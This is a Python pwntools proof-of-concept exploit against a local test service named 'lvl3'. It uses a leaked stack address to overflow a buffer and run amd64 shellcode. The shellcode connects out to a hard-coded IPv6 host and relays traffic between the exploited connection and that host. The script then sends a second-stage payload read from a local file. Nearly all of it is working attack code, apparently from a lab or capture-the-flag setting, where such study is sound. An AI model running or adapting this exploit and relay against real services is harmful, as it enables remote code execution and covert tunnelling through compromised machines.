# Proof-of-concept client for a stack buffer overflow in a local test
# service ("lvl3", TCP 8181).  The service prints the address of its stack
# buffer in a "DEBUG: buf is at ..." line; the script reuses that leaked
# address as the saved return address so execution lands in the overflowed
# buffer itself.  That only works where the stack is executable and no
# canary sits between the buffer and the return address — TODO confirm
# against the binary, nothing here checks either.
from pwn import *
context(arch='amd64', os='linux')
lvl3_host: str = 'localhost'
io = remote(lvl3_host, 8181)
# First round trip: send a short filler line and harvest the stack leak.
io.sendline(b"A" * 0x60)
io.recvuntil(b"DEBUG: buf is at ")
buf_addr: int = int(io.recvline().decode().strip(), 16)
print(hex(buf_addr))
# Stage-1 shellcode, assembled below by pwntools' asm().  Read together with
# the inline /* */ assembler comments (they are part of the string literal
# and are left untouched): open an AF_INET6 stream socket, connect it to the
# hard-coded sockaddr_in6 built from the four pushed immediates (28 bytes,
# the size passed in rdx), then loop relaying data between descriptor 5 and
# the new socket.  Descriptors 5 and 6 are hard-coded rather than taken from
# syscall return values — the value socket() returns in rax is never saved —
# so the code silently assumes the service's inbound connection is fd 5 and
# the new socket is fd 6.  The commented-out /* incus ... */ block is an
# alternative sockaddr the author kept for a second environment.
# Relay loop (rloop): read(5) is retried only while it returns a negative
# value, so a zero-length read on fd 5 is not checked and the loop goes on;
# the loop ends only when read(6) returns 0 (test r15, r15).  There is no
# exit syscall after the loop; execution runs off the end of the shellcode
# into the NOP padding appended below.
sc = '''
/* socket(0xa, 0x1, 0) */
mov eax, 41 /* socket */
mov rdi, 0xa
mov rsi, 0x1
xor rdx, rdx
syscall
/* prod */
mov r15, 0x0000000000000000
push r15
mov r15, 0xdec0defeff3e1602
push r15
mov r15, 0xaae9661fab9a0090
push r15
mov r15, 0x00000000901f000a
push r15
/* incus
mov r15, 0x0000000000000000
push r15
mov r15, 0xdac0defeff3e1602
push r15
mov r15, 0xaae9661fab9a0090
push r15
mov r15, 0x00000000901f000a
push r15
*/
mov rsi, rsp
mov rdx, 28
mov rax, 42
mov rdi, 6
syscall
sub rsp, 1024
/* read(5, rsp, 1024) */
rloop:
xor rax, rax
mov rdi, 5
mov rsi, rsp
mov rdx, 0x400
syscall
cmp rax, 0
jl rloop
/* write(6, rsp, rax) */
mov rdx, rax
mov rax, 1
mov rdi, 6
syscall
/* read(6, rsp, 32) */
mov rax, 0
mov rdi, 6
mov rsi, rsp
mov rdx, 32
syscall
mov r15, rax
/* write(5, rsp, rax) */
mov rdx, rax
mov rax, 1
mov rdi, 5
mov rsi, rsp
syscall
test r15, r15
jne rloop
'''
# Echo the assembly source for the operator's log, then assemble it.
print(sc)
sc = asm(sc)
# Overflow layout: shellcode, NOP (0x90) padding up to the 280-byte offset
# of the saved return address, then the leaked buffer address as the new
# return address.  The 280 is specific to this service's stack frame.
p1: bytes = sc + b'\x90' * (280 - len(sc)) + p64(buf_addr)
io.sendline(p1)
# pause()
# Consume one response line before the second stage; what the service
# prints here is not shown on this page.
io.recvline()
# Second-stage payload comes from a local file that is not on this page;
# presumably it is what the relay loop above forwards on — verify against
# the file's contents.
with open('pl_internal', 'rb') as fd:
    pint: bytes = fd.read()
io.sendline(pint)
io.interactive()